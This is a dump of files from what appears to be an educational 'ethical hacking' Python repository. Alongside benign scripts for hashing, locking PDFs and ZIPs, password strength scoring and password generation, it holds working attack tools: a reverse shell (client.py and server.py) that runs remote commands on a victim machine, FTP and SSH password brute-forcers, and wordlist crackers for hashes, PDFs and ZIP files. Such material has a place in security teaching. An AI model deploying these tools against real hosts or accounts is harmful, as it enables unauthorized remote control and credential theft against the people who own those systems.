-------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Files/Programs/7z2107-x64.exe -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/Pictures/cat face flat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Pictures/cat face flat.jpg -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/Pictures/cute_dog_flat_light.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-2/ransomware/test-folder/Pictures/cute_dog_flat_light.png -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/test.txt: -------------------------------------------------------------------------------- 1 | This is the test file -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/test2.txt: -------------------------------------------------------------------------------- 1 | This is another test file -------------------------------------------------------------------------------- /chapter-2/ransomware/test-folder/test3.txt: -------------------------------------------------------------------------------- 1 | yet another text file! 
-------------------------------------------------------------------------------- /chapter-2/simple-reverse-shell/client.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import os 3 | import subprocess 4 | import sys 5 | 6 | SERVER_HOST = sys.argv[1] 7 | SERVER_PORT = 5003 8 | BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase 9 | # separator string for sending 2 messages in one go 10 | SEPARATOR = "" 11 | 12 | # create the socket object 13 | s = socket.socket() 14 | # connect to the server 15 | s.connect((SERVER_HOST, SERVER_PORT)) 16 | # get the current directory and send it 17 | cwd = os.getcwd() 18 | s.send(cwd.encode()) 19 | 20 | while True: 21 | # receive the command from the server 22 | command = s.recv(BUFFER_SIZE).decode() 23 | splited_command = command.split() 24 | if command.lower() == "exit": 25 | # if the command is exit, just break out of the loop 26 | break 27 | if splited_command[0].lower() == "cd": 28 | # cd command, change directory 29 | try: 30 | os.chdir(' '.join(splited_command[1:])) 31 | except FileNotFoundError as e: 32 | # if there is an error, set as the output 33 | output = str(e) 34 | else: 35 | # if operation is successful, empty message 36 | output = "" 37 | else: 38 | # execute the command and retrieve the results 39 | output = subprocess.getoutput(command) 40 | # get the current working directory as output 41 | cwd = os.getcwd() 42 | # send the results back to the server 43 | message = f"{output}{SEPARATOR}{cwd}" 44 | s.send(message.encode()) 45 | # close client connection 46 | s.close() -------------------------------------------------------------------------------- /chapter-2/simple-reverse-shell/server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | SERVER_HOST = "0.0.0.0" 4 | SERVER_PORT = 5003 5 | BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase 6 | # 
separator string for sending 2 messages in one go 7 | SEPARATOR = "" 8 | 9 | # create a socket object 10 | s = socket.socket() 11 | 12 | # bind the socket to all IP addresses of this host 13 | s.bind((SERVER_HOST, SERVER_PORT)) 14 | # make the PORT reusable 15 | # when you run the server multiple times in Linux, Address already in use error will raise 16 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 17 | s.listen(5) 18 | print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...") 19 | 20 | # accept any connections attempted 21 | client_socket, client_address = s.accept() 22 | print(f"{client_address[0]}:{client_address[1]} Connected!") 23 | 24 | # receiving the current working directory of the client 25 | cwd = client_socket.recv(BUFFER_SIZE).decode() 26 | print("[+] Current working directory:", cwd) 27 | 28 | while True: 29 | # get the command from prompt 30 | command = input(f"{cwd} $> ") 31 | if not command.strip(): 32 | # empty command 33 | continue 34 | # send the command to the client 35 | client_socket.send(command.encode()) 36 | if command.lower() == "exit": 37 | # if the command is exit, just break out of the loop 38 | break 39 | # retrieve command results 40 | output = client_socket.recv(BUFFER_SIZE).decode() 41 | # split command output and current directory 42 | results, cwd = output.split(SEPARATOR) 43 | # print output 44 | print(results) 45 | # close connection to the client 46 | client_socket.close() 47 | # close server connection 48 | s.close() -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ftp/bruteforce_ftp.py: -------------------------------------------------------------------------------- 1 | import ftplib 2 | from colorama import Fore, init # for fancy colors, nothing else 3 | import argparse 4 | 5 | # init the console for colors (for Windows) 6 | init() 7 | # port of FTP, aka 21 8 | port = 21 9 | 10 | def is_correct(host, user, password): 11 | # initialize the FTP server 
object 12 | server = ftplib.FTP() 13 | print(f"[!] Trying", password) 14 | try: 15 | # tries to connect to FTP server with a timeout of 5 16 | server.connect(host, port, timeout=5) 17 | # login using the credentials (user & password) 18 | server.login(user, password) 19 | except ftplib.error_perm: 20 | # login failed, wrong credentials 21 | return False 22 | else: 23 | # correct credentials 24 | print(f"{Fore.GREEN}[+] Found credentials: ") 25 | print(f"\tHost: {host}") 26 | print(f"\tUser: {user}") 27 | print(f"\tPassword: {password}{Fore.RESET}") 28 | return True 29 | 30 | 31 | if __name__ == "__main__": 32 | parser = argparse.ArgumentParser(description="FTP server bruteforcing script") 33 | parser.add_argument("host", help="Hostname of IP address of the FTP server to bruteforce.") 34 | parser.add_argument("-u", "--user", help="The host username") 35 | parser.add_argument("-P", "--passlist", help="File that contain the password list separated by new lines") 36 | 37 | args = parser.parse_args() 38 | # hostname or IP address of the FTP server 39 | host = args.host 40 | # username of the FTP server, root as default for linux 41 | user = args.user 42 | # read the wordlist of passwords 43 | passwords = open(args.passlist).read().split("\n") 44 | print("[+] Passwords to try:", len(passwords)) 45 | 46 | # iterate over passwords one by one 47 | # if the password is found, break out of the loop 48 | for password in passwords: 49 | if is_correct(host, user, password): 50 | break -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ftp/requirements.txt: -------------------------------------------------------------------------------- 1 | colorama -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ftp/wordlist.txt: -------------------------------------------------------------------------------- 1 | test 2 | 1234 3 | admin 4 | abc123 5 | test123 6 | 
toywordlist -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ssh/bruteforce_ssh.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import socket 3 | import time 4 | from colorama import init, Fore 5 | 6 | # initialize colorama 7 | init() 8 | 9 | GREEN = Fore.GREEN 10 | RED = Fore.RED 11 | RESET = Fore.RESET 12 | BLUE = Fore.BLUE 13 | 14 | 15 | def is_ssh_open(hostname, username, password): 16 | # initialize SSH client 17 | client = paramiko.SSHClient() 18 | # add to know hosts 19 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 20 | try: 21 | client.connect(hostname=hostname, username=username, password=password, timeout=3) 22 | except socket.timeout: 23 | # this is when host is unreachable 24 | print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}") 25 | return False 26 | except paramiko.AuthenticationException: 27 | print(f"[!] Invalid credentials for {username}:{password}") 28 | return False 29 | except paramiko.SSHException: 30 | print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}") 31 | # sleep for a minute 32 | time.sleep(60) 33 | return is_ssh_open(hostname, username, password) 34 | else: 35 | # connection was established successfully 36 | print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}") 37 | return True 38 | 39 | 40 | if __name__ == "__main__": 41 | import argparse 42 | parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.") 43 | parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.") 44 | parser.add_argument("-P", "--passlist", help="File that contain password list in each line.") 45 | parser.add_argument("-u", "--user", help="Host username.") 46 | 47 | # parse passed arguments 48 | args = parser.parse_args() 49 | host = args.host 50 | passlist = args.passlist 51 | user = args.user 
52 | # read the file 53 | passlist = open(passlist).read().splitlines() 54 | # brute-force 55 | for password in passlist: 56 | if is_ssh_open(host, user, password): 57 | # if combo is valid, save it to a file 58 | open("credentials.txt", "w").write(f"{user}@{host}:{password}") 59 | break -------------------------------------------------------------------------------- /chapter-3/cracking/bruteforce-ssh/requirements.txt: -------------------------------------------------------------------------------- 1 | paramiko 2 | colorama -------------------------------------------------------------------------------- /chapter-3/cracking/hash-cracker/benchmark_speed.py: -------------------------------------------------------------------------------- 1 | import timeit 2 | 3 | hash_names = [ 4 | 'md5', 'sha1', 5 | 'sha224', 'sha256', 'sha384', 'sha512', 6 | 'sha3_224', 'sha3_256', 'sha3_384', 'sha3_512', 7 | 'blake2b', 'blake2s', 8 | ] 9 | 10 | for hash_name in hash_names: 11 | print(f"[*] Benchmarking {hash_name}...") 12 | setup = f"import hashlib; hash_fn = hashlib.{hash_name}" 13 | print(timeit.timeit('hash_fn(b"test").hexdigest()', setup=setup, number=1000000)) 14 | print() -------------------------------------------------------------------------------- /chapter-3/cracking/hash-cracker/crack_hashes.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | from tqdm import tqdm 3 | 4 | # List of supported hash types, for a complete list see hashlib.algorithms_available 5 | hash_names = [ 6 | 'blake2b', 'blake2s', 7 | 'md5', 'sha1', 8 | 'sha224', 'sha256', 'sha384', 'sha512', 9 | 'sha3_224', 'sha3_256', 'sha3_384', 'sha3_512', 10 | ] 11 | 12 | def crack_hash(hash, wordlist, hash_type=None): 13 | """Crack a hash using a wordlist. 14 | Args: 15 | hash (str): The hash to crack. 16 | wordlist (str): The path to the wordlist. 17 | Returns: 18 | str: The cracked hash. 
19 | """ 20 | hash_fn = getattr(hashlib, hash_type, None) 21 | if hash_fn is None or hash_type not in hash_names: 22 | # not supported hash type 23 | raise ValueError(f'[!] Invalid hash type: {hash_type}, supported are {hash_names}') 24 | # Count the number of lines in the wordlist to set the total 25 | total_lines = sum(1 for line in open(wordlist, 'r')) 26 | print(f"[*] Cracking hash {hash} using {hash_type} with a list of {total_lines} words.") 27 | # open the wordlist 28 | with open(wordlist, 'r') as f: 29 | # iterate over each line 30 | for line in tqdm(f, desc='Cracking hash', total=total_lines): 31 | if hash_fn(line.strip().encode()).hexdigest() == hash: 32 | return line 33 | 34 | 35 | if __name__ == "__main__": 36 | import argparse 37 | parser = argparse.ArgumentParser(description='Crack a hash using a wordlist.') 38 | parser.add_argument('hash', help='The hash to crack.') 39 | parser.add_argument('wordlist', help='The path to the wordlist.') 40 | parser.add_argument('--hash-type', help='The hash type to use.', default='md5') 41 | args = parser.parse_args() 42 | print() 43 | print("[+] Found password:", crack_hash(args.hash, args.wordlist, args.hash_type)) 44 | -------------------------------------------------------------------------------- /chapter-3/cracking/hash-cracker/requirements.txt: -------------------------------------------------------------------------------- 1 | tqdm -------------------------------------------------------------------------------- /chapter-3/cracking/hash-cracker/simple_hashing.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | # encode it to bytes using UTF-8 encoding 4 | message = "Some text to hash".encode() 5 | 6 | # hash with MD5 (not recommended) 7 | print("MD5:", hashlib.md5(message).hexdigest()) 8 | 9 | # hash with SHA-2 (SHA-256 & SHA-512) 10 | print("SHA-256:", hashlib.sha256(message).hexdigest()) 11 | print("SHA-512:", hashlib.sha512(message).hexdigest()) 12 
| 13 | # hash with SHA-3 14 | print("SHA-3-256:", hashlib.sha3_256(message).hexdigest()) 15 | print("SHA-3-512:", hashlib.sha3_512(message).hexdigest()) 16 | 17 | # hash with BLAKE2 18 | # 256-bit BLAKE2 (or BLAKE2s) 19 | print("BLAKE2c:", hashlib.blake2s(message).hexdigest()) 20 | # 512-bit BLAKE2 (or BLAKE2b) 21 | print("BLAKE2b:", hashlib.blake2b(message).hexdigest()) 22 | -------------------------------------------------------------------------------- /chapter-3/cracking/pdf-cracker/foo-protected.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/cracking/pdf-cracker/foo-protected.pdf -------------------------------------------------------------------------------- /chapter-3/cracking/pdf-cracker/pdf_cracker_pikepdf.py: -------------------------------------------------------------------------------- 1 | import pikepdf 2 | from tqdm import tqdm 3 | import sys 4 | 5 | # the target PDF file 6 | pdf_file = sys.argv[1] 7 | # the word list file 8 | wordlist = sys.argv[2] 9 | 10 | # load password list 11 | passwords = [ line.strip() for line in open(wordlist) ] 12 | 13 | # iterate over passwords 14 | for password in tqdm(passwords, "Decrypting PDF"): 15 | try: 16 | # open PDF file 17 | with pikepdf.open(pdf_file, password=password) as pdf: 18 | # Password decrypted successfully, break out of the loop 19 | print("[+] Password found:", password) 20 | break 21 | except pikepdf._qpdf.PasswordError as e: 22 | # wrong password, just continue in the loop 23 | continue -------------------------------------------------------------------------------- /chapter-3/cracking/pdf-cracker/pdf_cracker_pymupdf.py: -------------------------------------------------------------------------------- 1 | import fitz 2 | from tqdm import tqdm 3 | 4 | def crack_pdf(pdf_path, password_list): 5 | """Crack PDF password using a list of passwords 
6 | Args: 7 | pdf_path (str): Path to the PDF file 8 | password_list (list): List of passwords to try 9 | Returns: 10 | [str]: Returns the password if found, else None""" 11 | # open the PDF 12 | doc = fitz.open(pdf_path) 13 | # iterate over passwords 14 | for password in tqdm(password_list, "Guessing password"): 15 | # try to open with the password 16 | if doc.authenticate(password): 17 | # when password is found, authenticate returns non-zero 18 | # break out of the loop & return the password 19 | return password 20 | 21 | if __name__ == "__main__": 22 | import sys 23 | pdf_filename = sys.argv[1] 24 | wordlist_filename = sys.argv[2] 25 | # load the password list 26 | with open(wordlist_filename, "r", errors="replace") as f: 27 | # read all passwords into a list 28 | passwords = f.read().splitlines() 29 | # call the function to crack the password 30 | password = crack_pdf(pdf_filename, passwords) 31 | if password: 32 | print(f"[+] Password found: {password}") 33 | else: 34 | print("[!] Password not found") -------------------------------------------------------------------------------- /chapter-3/cracking/pdf-cracker/requirements.txt: -------------------------------------------------------------------------------- 1 | pikepdf 2 | tqdm 3 | pymupdf -------------------------------------------------------------------------------- /chapter-3/cracking/zip-cracker/requirements.txt: -------------------------------------------------------------------------------- 1 | tqdm -------------------------------------------------------------------------------- /chapter-3/cracking/zip-cracker/secret.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/cracking/zip-cracker/secret.zip -------------------------------------------------------------------------------- /chapter-3/cracking/zip-cracker/zip_cracker.py: 
-------------------------------------------------------------------------------- 1 | from tqdm import tqdm 2 | 3 | import zipfile 4 | import sys 5 | 6 | # the zip file you want to crack its password 7 | zip_file = sys.argv[1] 8 | # the password list path you want to use 9 | wordlist = sys.argv[2] 10 | # initialize the Zip File object 11 | zip_file = zipfile.ZipFile(zip_file) 12 | # count the number of words in this wordlist 13 | n_words = len(list(open(wordlist, "rb"))) 14 | # print the total number of passwords 15 | print("Total passwords to test:", n_words) 16 | with open(wordlist, "rb") as wordlist: 17 | for word in tqdm(wordlist, total=n_words, unit="word"): 18 | try: 19 | zip_file.extractall(pwd=word.strip()) 20 | except: 21 | continue 22 | else: 23 | print("[+] Password found:", word.decode().strip()) 24 | exit(0) 25 | print("[!] Password not found, try other wordlist.") -------------------------------------------------------------------------------- /chapter-3/locking-files/files/example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/locking-files/files/example.pdf -------------------------------------------------------------------------------- /chapter-3/locking-files/files/image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/locking-files/files/image.jpg -------------------------------------------------------------------------------- /chapter-3/locking-files/files/locked_example.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/locking-files/files/locked_example.pdf 
-------------------------------------------------------------------------------- /chapter-3/locking-files/files/secure_example.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/x4nth055/ethical-hacking-tools-python/5183698f8f19524cd729ed763c9a78e65a6d8f53/chapter-3/locking-files/files/secure_example.zip -------------------------------------------------------------------------------- /chapter-3/locking-files/locking_pdf.py: -------------------------------------------------------------------------------- 1 | import fitz # PyMuPDF 2 | 3 | def lock_pdf(input_file, output_file, password): 4 | """ 5 | Locks a PDF file with the given password. 6 | 7 | Args: 8 | input_file (str): The path to the PDF file to be locked. 9 | output_file (str): The path where the locked PDF will be saved. 10 | password (str): The password to encrypt the PDF. 11 | """ 12 | # Open the existing PDF 13 | document = fitz.open(input_file) 14 | # Encrypt the document 15 | document.save(output_file, encryption=fitz.PDF_ENCRYPT_AES_256, owner_pw=password, user_pw=password, permissions=fitz.PDF_PERM_FORM) 16 | # Close the document 17 | document.close() 18 | print(f"PDF locked and saved as {output_file}") 19 | 20 | # Example usage 21 | lock_pdf("files/example.pdf", "files/locked_example.pdf", "secure1234") 22 | -------------------------------------------------------------------------------- /chapter-3/locking-files/locking_zip.py: -------------------------------------------------------------------------------- 1 | import pyzipper 2 | 3 | def create_protected_zip(output_zip, file_paths, password): 4 | """ 5 | Creates a password-protected ZIP file with AES encryption. 6 | 7 | Args: 8 | output_zip (str): The name of the output ZIP file. 9 | file_paths (list): A list of paths to the files to be included in the ZIP. 10 | password (str): The password to secure the ZIP file. 
11 | """ 12 | # Use AES encryption 13 | with pyzipper.AESZipFile(output_zip, 'w', compression=pyzipper.ZIP_DEFLATED, encryption=pyzipper.WZ_AES) as zf: 14 | zf.setpassword(password.encode('utf-8')) 15 | # Add files to the ZIP file 16 | for file_path in file_paths: 17 | zf.write(file_path, arcname=file_path.split('/')[-1]) 18 | 19 | print(f"ZIP file '{output_zip}' created and locked with a password.") 20 | 21 | # Example usage 22 | files_to_zip = ['files/example.pdf', 'files/image.jpg'] 23 | create_protected_zip("files/secure_example.zip", files_to_zip, password="secure1234") 24 | -------------------------------------------------------------------------------- /chapter-3/locking-files/requirements.txt: -------------------------------------------------------------------------------- 1 | PyMuPDF 2 | pyzipper -------------------------------------------------------------------------------- /chapter-3/password-evaluator/password_evaluator.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | def check_password_strength(password): 4 | """ 5 | Check the strength of a password based on various criteria. 6 | 7 | Parameters: 8 | password (str): The password to be checked for strength. 9 | 10 | Returns: 11 | int: The strength score of the password (out of 5). 
12 | """ 13 | strength_score = 0 14 | # Check if password length is at least 8 characters 15 | if len(password) >= 8: 16 | strength_score += 1 17 | # Check if password contains at least one lowercase letter 18 | if any(c.islower() for c in password): 19 | strength_score += 1 20 | # Check if password contains at least one uppercase letter 21 | if any(c.isupper() for c in password): 22 | strength_score += 1 23 | # Check if password contains at least one digit 24 | if any(c.isdigit() for c in password): 25 | strength_score += 1 26 | # Check if password contains at least one special character 27 | if any(c in string.punctuation for c in password): 28 | strength_score += 1 29 | 30 | return strength_score 31 | 32 | # Example usage 33 | passwords = ["weak", "password", "Password123", "Pass123!", "P@ssw0rd", "P@ssw0rd!", 34 | "P@ssw0rd!123", "YouGotMe159@K", "EzatjeqRYTIERsoygjwqer@12"] 35 | for pwd in passwords: 36 | score = check_password_strength(pwd) 37 | print(f"Password: {pwd}, Strength Score: {score}/5") 38 | -------------------------------------------------------------------------------- /chapter-3/password-evaluator/password_strength_evaluator.py: -------------------------------------------------------------------------------- 1 | from password_strength import PasswordStats 2 | 3 | def evaluate_password(password): 4 | """ 5 | Evaluate the strength of a given password using the PasswordStats class from the password_strength library. 6 | 7 | Parameters: 8 | password (str): The password to be evaluated. 9 | 10 | Returns: 11 | float: A numerical value representing the strength of the password. 12 | 13 | The function creates a PasswordStats object using the provided password and returns the strength of the password. 14 | The strength is calculated based on various factors such as length, complexity, and common patterns. 
15 | """ 16 | 17 | stats = PasswordStats(password) 18 | return stats.strength() 19 | 20 | # Example usage 21 | passwords = ["weak", "password", "Password123", "Pass123!", "P@ssw0rd", "P@ssw0rd!", 22 | "P@ssw0rd!123", "YouGotMe159@K", "EzatjeqRYTIERsoygjwqer@12"] 23 | for pwd in passwords: 24 | strength = evaluate_password(pwd) 25 | print(f"Password: {pwd}, Strength: {strength:.2f}") 26 | -------------------------------------------------------------------------------- /chapter-3/password-evaluator/requirements.txt: -------------------------------------------------------------------------------- 1 | password_strength 2 | zxcvbn -------------------------------------------------------------------------------- /chapter-3/password-evaluator/using_zxcvbn.py: -------------------------------------------------------------------------------- 1 | from zxcvbn import zxcvbn 2 | 3 | def assess_password(password): 4 | """ 5 | Assess the strength of a given password using the zxcvbn library. 6 | 7 | Parameters: 8 | password (str): The password to be assessed. 9 | 10 | Returns: 11 | tuple: A tuple containing the strength score (int) and feedback (dict) of the password. 
12 | """ 13 | # Use the zxcvbn library to analyze the password 14 | results = zxcvbn(password) 15 | # Extract the strength score and feedback from the results 16 | strength_score = results['score'] 17 | feedback = results['feedback'] 18 | return strength_score, feedback 19 | 20 | # Example usage 21 | passwords = ["weak", "password", "Password123", "Pass123!", "P@ssw0rd", "P@ssw0rd!", 22 | "P@ssw0rd!123", "YouGotMe159@K", "EzatjeqRYTIERsoygjwqer@12"] 23 | for pwd in passwords: 24 | # Assess the strength of each password in the list 25 | score, feedback = assess_password(pwd) 26 | # Print the password, its strength score, and suggestions for improvement 27 | print(f"Password: {pwd}, Strength Score: {score}/4") 28 | print(f"Suggestions: {feedback['suggestions']}") 29 | -------------------------------------------------------------------------------- /chapter-3/passwordgenerator/password_generator.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import secrets 3 | import random 4 | import string 5 | 6 | # Setting up the Argument Parser 7 | parser = argparse.ArgumentParser( 8 | prog='Password Generator.', 9 | description='Generate any number of passwords with this tool.' 10 | ) 11 | 12 | # Adding the arguments to the parser 13 | parser.add_argument("-n", "--numbers", default=0, help="Number of digits in the PW", type=int) 14 | parser.add_argument("-l", "--lowercase", default=0, help="Number of lowercase chars in the PW", type=int) 15 | parser.add_argument("-u", "--uppercase", default=0, help="Number of uppercase chars in the PW", type=int) 16 | parser.add_argument("-s", "--special-chars", default=0, help="Number of special chars in the PW", type=int) 17 | 18 | # add total pw length argument 19 | parser.add_argument("-t", "--total-length", type=int, 20 | help="The total password length. 
If passed, it will ignore -n, -l, -u and -s, " \ 21 | "and generate completely random passwords with the specified length") 22 | 23 | # The amount is a number so we check it to be of type int. 24 | parser.add_argument("-a", "--amount", default=1, type=int) 25 | parser.add_argument("-o", "--output-file") 26 | 27 | # Parsing the command line arguments. 28 | args = parser.parse_args() 29 | 30 | # list of passwords 31 | passwords = [] 32 | # Looping through the amount of passwords. 33 | for _ in range(args.amount): 34 | if args.total_length: 35 | # generate random password with the length 36 | # of total_length based on all available characters 37 | passwords.append("".join( 38 | [secrets.choice(string.digits + string.ascii_letters + string.punctuation) \ 39 | for _ in range(args.total_length)])) 40 | else: 41 | password = [] 42 | # how many numbers the password should contain 43 | for _ in range(args.numbers): 44 | password.append(secrets.choice(string.digits)) 45 | 46 | # how many uppercase characters the password should contain 47 | for _ in range(args.uppercase): 48 | password.append(secrets.choice(string.ascii_uppercase)) 49 | 50 | # how many lowercase characters the password should contain 51 | for _ in range(args.lowercase): 52 | password.append(secrets.choice(string.ascii_lowercase)) 53 | 54 | # how many special characters the password should contain 55 | for _ in range(args.special_chars): 56 | password.append(secrets.choice(string.punctuation)) 57 | # Shuffle the list with all the possible letters, numbers and symbols. 58 | random.shuffle(password) 59 | # Get the letters of the string up to the length argument and then join them. 60 | password = ''.join(password) 61 | # append this password to the overall list of password. 62 | passwords.append(password) 63 | # Store the password to a .txt file. 
64 | if args.output_file: 65 | with open(args.output_file, 'w') as f: 66 | f.write('\n'.join(passwords)) 67 | 68 | print('\n'.join(passwords)) -------------------------------------------------------------------------------- /chapter-3/wordlist-generator/aeiou.txt: -------------------------------------------------------------------------------- 1 | aa 2 | ae 3 | ai 4 | ao 5 | au 6 | ea 7 | ee 8 | ei 9 | eo 10 | eu 11 | ia 12 | ie 13 | ii 14 | io 15 | iu 16 | oa 17 | oe 18 | oi 19 | oo 20 | ou 21 | ua 22 | ue 23 | ui 24 | uo 25 | uu 26 | aaa 27 | aae 28 | aai 29 | aao 30 | aau 31 | aea 32 | aee 33 | aei 34 | aeo 35 | aeu 36 | aia 37 | aie 38 | aii 39 | aio 40 | aiu 41 | aoa 42 | aoe 43 | aoi 44 | aoo 45 | aou 46 | aua 47 | aue 48 | aui 49 | auo 50 | auu 51 | eaa 52 | eae 53 | eai 54 | eao 55 | eau 56 | eea 57 | eee 58 | eei 59 | eeo 60 | eeu 61 | eia 62 | eie 63 | eii 64 | eio 65 | eiu 66 | eoa 67 | eoe 68 | eoi 69 | eoo 70 | eou 71 | eua 72 | eue 73 | eui 74 | euo 75 | euu 76 | iaa 77 | iae 78 | iai 79 | iao 80 | iau 81 | iea 82 | iee 83 | iei 84 | ieo 85 | ieu 86 | iia 87 | iie 88 | iii 89 | iio 90 | iiu 91 | ioa 92 | ioe 93 | ioi 94 | ioo 95 | iou 96 | iua 97 | iue 98 | iui 99 | iuo 100 | iuu 101 | oaa 102 | oae 103 | oai 104 | oao 105 | oau 106 | oea 107 | oee 108 | oei 109 | oeo 110 | oeu 111 | oia 112 | oie 113 | oii 114 | oio 115 | oiu 116 | ooa 117 | ooe 118 | ooi 119 | ooo 120 | oou 121 | oua 122 | oue 123 | oui 124 | ouo 125 | ouu 126 | uaa 127 | uae 128 | uai 129 | uao 130 | uau 131 | uea 132 | uee 133 | uei 134 | ueo 135 | ueu 136 | uia 137 | uie 138 | uii 139 | uio 140 | uiu 141 | uoa 142 | uoe 143 | uoi 144 | uoo 145 | uou 146 | uua 147 | uue 148 | uui 149 | uuo 150 | uuu 151 | aaaa 152 | aaae 153 | aaai 154 | aaao 155 | aaau 156 | aaea 157 | aaee 158 | aaei 159 | aaeo 160 | aaeu 161 | aaia 162 | aaie 163 | aaii 164 | aaio 165 | aaiu 166 | aaoa 167 | aaoe 168 | aaoi 169 | aaoo 170 | aaou 171 | aaua 172 | aaue 173 | aaui 174 | aauo 175 | aauu 176 | aeaa 
177 | aeae 178 | aeai 179 | aeao 180 | aeau 181 | aeea 182 | aeee 183 | aeei 184 | aeeo 185 | aeeu 186 | aeia 187 | aeie 188 | aeii 189 | aeio 190 | aeiu 191 | aeoa 192 | aeoe 193 | aeoi 194 | aeoo 195 | aeou 196 | aeua 197 | aeue 198 | aeui 199 | aeuo 200 | aeuu 201 | aiaa 202 | aiae 203 | aiai 204 | aiao 205 | aiau 206 | aiea 207 | aiee 208 | aiei 209 | aieo 210 | aieu 211 | aiia 212 | aiie 213 | aiii 214 | aiio 215 | aiiu 216 | aioa 217 | aioe 218 | aioi 219 | aioo 220 | aiou 221 | aiua 222 | aiue 223 | aiui 224 | aiuo 225 | aiuu 226 | aoaa 227 | aoae 228 | aoai 229 | aoao 230 | aoau 231 | aoea 232 | aoee 233 | aoei 234 | aoeo 235 | aoeu 236 | aoia 237 | aoie 238 | aoii 239 | aoio 240 | aoiu 241 | aooa 242 | aooe 243 | aooi 244 | aooo 245 | aoou 246 | aoua 247 | aoue 248 | aoui 249 | aouo 250 | aouu 251 | auaa 252 | auae 253 | auai 254 | auao 255 | auau 256 | auea 257 | auee 258 | auei 259 | aueo 260 | aueu 261 | auia 262 | auie 263 | auii 264 | auio 265 | auiu 266 | auoa 267 | auoe 268 | auoi 269 | auoo 270 | auou 271 | auua 272 | auue 273 | auui 274 | auuo 275 | auuu 276 | eaaa 277 | eaae 278 | eaai 279 | eaao 280 | eaau 281 | eaea 282 | eaee 283 | eaei 284 | eaeo 285 | eaeu 286 | eaia 287 | eaie 288 | eaii 289 | eaio 290 | eaiu 291 | eaoa 292 | eaoe 293 | eaoi 294 | eaoo 295 | eaou 296 | eaua 297 | eaue 298 | eaui 299 | eauo 300 | eauu 301 | eeaa 302 | eeae 303 | eeai 304 | eeao 305 | eeau 306 | eeea 307 | eeee 308 | eeei 309 | eeeo 310 | eeeu 311 | eeia 312 | eeie 313 | eeii 314 | eeio 315 | eeiu 316 | eeoa 317 | eeoe 318 | eeoi 319 | eeoo 320 | eeou 321 | eeua 322 | eeue 323 | eeui 324 | eeuo 325 | eeuu 326 | eiaa 327 | eiae 328 | eiai 329 | eiao 330 | eiau 331 | eiea 332 | eiee 333 | eiei 334 | eieo 335 | eieu 336 | eiia 337 | eiie 338 | eiii 339 | eiio 340 | eiiu 341 | eioa 342 | eioe 343 | eioi 344 | eioo 345 | eiou 346 | eiua 347 | eiue 348 | eiui 349 | eiuo 350 | eiuu 351 | eoaa 352 | eoae 353 | eoai 354 | eoao 355 | eoau 356 | eoea 357 | eoee 358 | 
